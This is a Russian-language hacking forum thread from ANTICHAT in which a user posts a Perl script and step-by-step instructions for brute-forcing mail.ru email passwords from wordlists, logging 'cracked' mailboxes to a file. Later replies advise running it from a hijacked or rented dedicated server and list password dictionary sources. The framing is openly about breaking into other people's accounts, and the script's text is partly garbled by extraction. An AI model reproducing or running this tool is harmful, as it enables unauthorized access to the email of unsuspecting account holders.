HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости Mail-сервис
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 19.01.2012, 01:00
tickhack
Новичок
Регистрация: 24.01.2012
Сообщений: 11
С нами: 7526486

Репутация: -10
По умолчанию

Взломать аккаунт на mail.ru довольно просто, самый простой способ это перебор паролей по словарю)

Данный брут написан на языке Perl поэтому перед тем как читать дальше скачайте и установите Active Perl по адресу http://www.activestate.com/activeperl/

Сделано? Отлично...
Теперь создайте отдельную папку в которой будем создавать скрипт и создайте в этой папке пустые файлы перечисленные ниже:

code:

brute-mail.txt
mail.txt
pass.txt
log.txt

Теперь в файл mail.txt напишите встолбик адреса мыл на мэил ру которые необходимо ломануть
В файл pass.txt поместите словарь для брута - в столбик слова или цифры по которым будем подбирать.

Теперь в этой же папке создайте пустой текстовый файл и поместите в него код написанный ниже:

Код:

source:

Код:
#!/usr/bin/perl
use
LWP::UserAgent;
print
"########## GeNoM- mail.ru bruter v 1.3 ###############\n"
;
my
$ua = LWP::UserAgent->new(
max_size =>
1024
,
agent =>
'kakep brayzer v 9.1.1'
,
timeout =>
30
, 
); 
 
 
 
$set=
0
; 
$setall=
0
;
open
email,
") { 
$mails=~
s/\n//
;
# убираем символ конца строки
($login,$domain)=
split
(
/\@/
,$mails);
# разбираем мыло на логин и домен
if
($log==
1
){
open
logg,
">>log.txt"
;
print
logg
"-----Start brute-->$login\@$domain\n"
;
close
logg;}
open
pass,
"$login\@$domain\n\n"
;
open
logg,
">>log.txt"
;
print
logg
"\n-----Start brute-->$login\@$domain\n\n"
;
close
logg;
while
($password=) { 
$password=~
s/\n//
;
# убираем символ конца строки
my
$req = HTTP::Request->new(
POST =>
'http://win.mail.ru/cgi-bin/auth'
); 
$req->content(
"page=&post=&login_from=http://mail.ru/&Login=$login&Domain=$domain&Password=$password"
); 
$req->referer(
'http://win.mail.ru/cgi-bin/auth'
);
my
$res = $ua->request($req); 
$yda4a=$res->as_string;
if
($yda4a=~
m/500 Can't connect/
==
1
) {
print
"$yda4a\n"
;
exit
;}
# выводим текущее состояние брута
if
($set==$setting){$time=
localtime
;$time=
substr
($time,
4
,
15
);
print
"Send pass->$password  Bcego proBepeHo-->$setall  Time-->$time\n"
;
open
logg,
">>log.txt"
;$time=
localtime
;$time=
substr
($time,
4
,
15
);
print
logg
"Send pass->$password  Bcego proBepeHo-->$setall  Time-->$time\n"
;
close
logg;$set=
0
;}
if
($yda4a=~
m/checkcookie/
==
1
) {
print
"For $login\@$domain password->$password\n"
;
open
brut,
">>brute-mail.txt"
;
print
brut
"$login\@$domain password->$password\n"
;
close
brut;
open
logg,
">>log.txt"
;
print
logg
"For $login\@$domain password->$password\n"
;
close
logg;
goto
nashol;}    
 
$set++;    
$setall++;      
   
} 
 
nashol:
close
pass; 
}
close
email;

Переименуйте этот файл на mail-ru.pl

Все, брутфорс готов!
Двойным щелчком запустите mail-ru.pl и в появившемся окне наблюдайте за ходом бручения.
В файле log.txt будет фиксироваться отчет, а в файле brute-mail.txt будут появляться взломанные мыла.
вот дедик для брута только есть просьба не меняйте пароля создайте себе учётку и пользуйтесь
Hide:
Чтобы просмотреть данный текст, авторизуйтесь на форуме.
 
Ответить с цитированием

  #2  
Старый 20.01.2012, 01:00
STALKER
Новичок
Регистрация: 22.02.2004
Сообщений: 4
С нами: 11691659

Репутация: 0
По умолчанию

Понял! Это эффективно
 
Ответить с цитированием

  #3  
Старый 20.01.2012, 01:00
tickhack
Новичок
Регистрация: 24.01.2012
Сообщений: 11
С нами: 7526486

Репутация: -10
По умолчанию

если помог от + не откажусь !
 
Ответить с цитированием

  #4  
Старый 20.01.2012, 01:00
tickhack
Новичок
Регистрация: 24.01.2012
Сообщений: 11
С нами: 7526486

Репутация: -10
По умолчанию

Цитата:

Сообщение от Yorvet

Странно, у меня не получается. Решил проверить, в pass записал правильный один пароль для ящика, в mail сам адрес ящика, результат брута нулевой. Что я сделал не так?

а ты попробуй много пассов написать и в том числе правильный и проверь !
 
Ответить с цитированием

  #5  
Старый 20.01.2012, 01:00
STALKER
Новичок
Регистрация: 22.02.2004
Сообщений: 4
С нами: 11691659

Репутация: 0
По умолчанию

прощу прощения а где взять это брут?
 
Ответить с цитированием

  #6  
Старый 20.01.2012, 01:00
tickhack
Новичок
Регистрация: 24.01.2012
Сообщений: 11
С нами: 7526486

Репутация: -10
По умолчанию

Цитата:

Сообщение от nesquik

Active Perl

как именно его запустить?

устанавливаешь перл и потом на C диске создаешь папку script и закинь туда скрипт. заходишь в командную строку и пишешь cd c:\script потом интер потом пишешь имя скрипта и нажемаешь интер и всё !
 
Ответить с цитированием

  #7  
Старый 20.01.2012, 01:00
tickhack
Новичок
Регистрация: 24.01.2012
Сообщений: 11
С нами: 7526486

Репутация: -10
По умолчанию

Цитата:

Сообщение от Yorvet

Странно, у меня не получается. Решил проверить, в pass записал правильный один пароль для ящика, в mail сам адрес ящика, результат брута нулевой. Что я сделал не так?

ты на своём компе брутил ?
 
Ответить с цитированием

  #8  
Старый 20.01.2012, 01:00
tickhack
Новичок
Регистрация: 24.01.2012
Сообщений: 11
С нами: 7526486

Репутация: -10
По умолчанию

Цитата:

Сообщение от Yorvet

Да, на своём.

попробуй с дедика
 
Ответить с цитированием

  #9  
Старый 20.01.2012, 01:00
tickhack
Новичок
Регистрация: 24.01.2012
Сообщений: 11
С нами: 7526486

Репутация: -10
По умолчанию

Цитата:

Сообщение от Andorfin

с какого словаря лучше начать..?Ни разу не брутил,просто интересно.Дайте ссылку на актуальный словарь.Спасибо!

словари !
www.passwords.ru/dic.htm
ftp.openwall.com/pub/wordlists/
ftp.cerias.purdue.edu/pub/dict/
ftp.ox.ac.uk/pub/wordlists/
ftp.funet.fi/pub/unix/security/dictionaries/
www.outpost9.com/files/WordLists.html
www.phreak.com/html/wordlists.shtml
coast.cs.purdue.edu/pub/dict/wordlists/
http://www.insidepro.com/rus/download.shtml
www.outpost9.com/files/WordLists.html
http://hw.ucoz.net/load
вот ту коешто накавырял
 
Ответить с цитированием

  #10  
Старый 20.01.2012, 01:00
StoKov
Новичок
Регистрация: 21.12.2011
Сообщений: 8
С нами: 7575446

Репутация: 0
По умолчанию

Спасибо
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.